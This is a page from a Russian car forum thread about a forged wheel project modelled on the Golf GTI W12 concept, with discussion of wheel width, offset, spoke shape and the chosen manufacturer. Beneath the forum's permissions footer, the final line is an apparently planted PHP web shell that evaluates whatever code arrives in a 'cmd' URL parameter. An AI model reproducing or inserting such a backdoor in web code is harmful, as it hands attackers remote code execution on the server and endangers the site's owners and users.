+ Ответить в теме
Страница 2 из 83 ПерваяПервая 1 2 3 4 12 52 ... ПоследняяПоследняя
Показано с 11 по 20 из 827

Тема: КОВАНОЕ КОЛЕСО в стиле концепт-кара Golf GTI W12 650 [или Денвер и Детройт]


  1. #11
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(vadII &#064; Apr 2 2008, 12&#58;05) <{POST_SNAPBACK}></div><div class='quotemain'>Круть&#33;
    Это то чего я ждал, но так и не дождался не получив ответа в первичном топике... Заказал и уже получил BBS CO - 9кг вес. Если бы знал что проект состоится, то однозначно подождал бы [/b][/quote]
    Извини что не отвечал, так как запуск в производство ОЧЕНЬ дорогое удовольствие, из-за отсутствия финансирования, в тот момент когда ты спрашивал, проект был одной ногой в могиле и только мое глубокое убеждение что сцепление шин с дорогой САМОЕ узкое/слабое звено в автомобиле и соответственно тюнинг колес является самым оправданным, заставило меня «затянуть пояс» и выделить деньги в ущерб другим проектам...

    <div class='quotetop'>Цитата(vadII &#064; Apr 2 2008, 12&#58;05) <{POST_SNAPBACK}></div><div class='quotemain'>Да, кстати, так кто всё таки разрабатывает? "Бренд" какой будет? ;)[/b][/quote]
    Конкурс выиграл "МагАлТек" http://www.magaltech.ru/

  2. #12
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 12&#58;39) <{POST_SNAPBACK}></div><div class='quotemain'>еще бы ширину узнать, а то у меня комплект мишки 235&#092;45&#092;17 заготовлен.[/b][/quote]
    стандартные заготовки расчитаны на ширину 7,5 дюйма (7,5 х 17, вылет – от 20 до 55 мм, рассверловка от 98 до 130)

  3. #13
    <div class='quotetop'>Цитата(recarospeed &#064; Apr 2 2008, 12&#58;51) <{POST_SNAPBACK}></div><div class='quotemain'>стандартные заготовки расчитаны на ширину 7,5 дюйма (7,5 х 17, вылет – от 20 до 55 мм, рассверловка от 98 до 130)[/b][/quote]
    тогда нормально,
    еще вопрос, на 3д модели не видно, изгибаются ли плоскости лучей как на W12? очень бы не хотелось, что бы они плоские были.

  4. #14
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 13&#58;01) <{POST_SNAPBACK}></div><div class='quotemain'>тогда нормально,
    еще вопрос, на 3д модели не видно, изгибаются ли плоскости лучей как на W12? очень бы не хотелось, что бы они плоские были.[/b][/quote]


    Если я правильно тебя понял ты имел в виду изгиб спиц (лучей) относительно плоскости вращения колеса? Нет, относительно этой плоскости спицы практически прямые, изгиб начинается ближе к ступице. Это связано с имеющейся формой заготовки. Лично мне такая форма больше нравится, колесо в сборе с шиной выглядит более монолитно и так как спицы не выступают за шину снижается риск повреждения о бордюр при парковке.


  5. #15
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Кстати у оригинального колеса спицы так же плоские:





  6. #16
    да, ты меня правильно понял. на фотке видно, что бы повредить диск нужно сильно постараца. а выглядит диск в таком изогнутом состоянии интересней, чем в плоском виде, мне так кажеца

  7. #17
    <div class='quotetop'>Цитата(recarospeed &#064; Apr 2 2008, 13&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>Кстати у оригинального колеса спицы так же плоские:[/b][/quote]

    вот именно, мне оригинальные не очень нравяца, ты не хотел бы, что бы твои диски выглядели интересней?

    если ты хотел сделать что то вроде копии оригинала, только ковку, тогда конечно, изгибать лучи не стоит

  8. #18
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 14&#58;02) <{POST_SNAPBACK}></div><div class='quotemain'>...а выглядит диск в таком изогнутом состоянии интересней, чем в плоском виде, мне так кажеца [/b][/quote]
    согласен, интересней, но только когда колесо большого диаметра (на фото кажется 19 или 20 дюймов) и шина относительно низкопрофильная. В нашем размере эффект от такого изгиба будет обратный (ИХМО)

    + создатели концепта были вынуждены сделать такой изгиб колеса, так как из-за расширенного кузова пришлось расширять колею за счет вылета колеса.

  9. #19
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    <div class='quotetop'>Цитата(Карабаз &#064; Apr 2 2008, 14&#58;07) <{POST_SNAPBACK}></div><div class='quotemain'>вот именно, мне оригинальные не очень нравяца, ты не хотел бы, что бы твои диски выглядели интересней?

    если ты хотел сделать что то вроде копии оригинала, только ковку, тогда конечно, изгибать лучи не стоит [/b][/quote]
    Нет, я писал выше что не стремился сделать точную копию.

    Но в данном случае отсутствие изгиба спиц относительно плоскости вращения колеса обусловлена формой используемой заготовки.

    Форма заготовки в свою очередь рассчитана на возможностью установки больших тормозов.

  10. #20
    Вадим, я вижу как ситуация выглядит - когда тема начиналась никто помогать не торопился, а теперь, когда часть дела сделана, и результат трудов почти готов, приходят всякие карабасы и начинают давать советы, как лучше сделать.

    это нормально, я так же видел бы ситуацию

    но моя позиция вот какая - до тех пор, пока ты не упоминал дизайн дисков W12, мне эта тема не подходила, потому, что ты обозначил свой проект как "реплика оригинала в кованом исполнении" платить 7500-8000 р. за оригинал от Г-5, хоть и ковку я не хочу, мне такой дизайн не подходит, хоть ковку брать собираюсь и в ближайшее время, а вот дизайн W12, мне нравица.

    вот потому я и задаю разные вопросы и высказываю пожелания, так как являюсь потенциальным потребителем твоего продукта. ;)

+ Ответить в теме
Страница 2 из 83 ПерваяПервая 1 2 3 4 12 52 ... ПоследняяПоследняя

Похожие темы

  1. где покрасить диски детройт 18?
    от Bonder в разделе Шины, диски
    Ответов: 16
    Последнее сообщение: 02.04.2024, 16:35
  2. Помогите разобраться, спускает колесо!!!!!
    от Maksim190rus в разделе Шины, диски
    Ответов: 13
    Последнее сообщение: 02.04.2024, 14:14
  3. Колесо просказьзывает при ускорении.
    от Naber в разделе Шины, диски
    Ответов: 13
    Последнее сообщение: 02.04.2024, 12:59
  4. Ответов: 26
    Последнее сообщение: 03.01.2024, 09:05
  5. Ответов: 1
    Последнее сообщение: 18.08.2007, 10:46

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}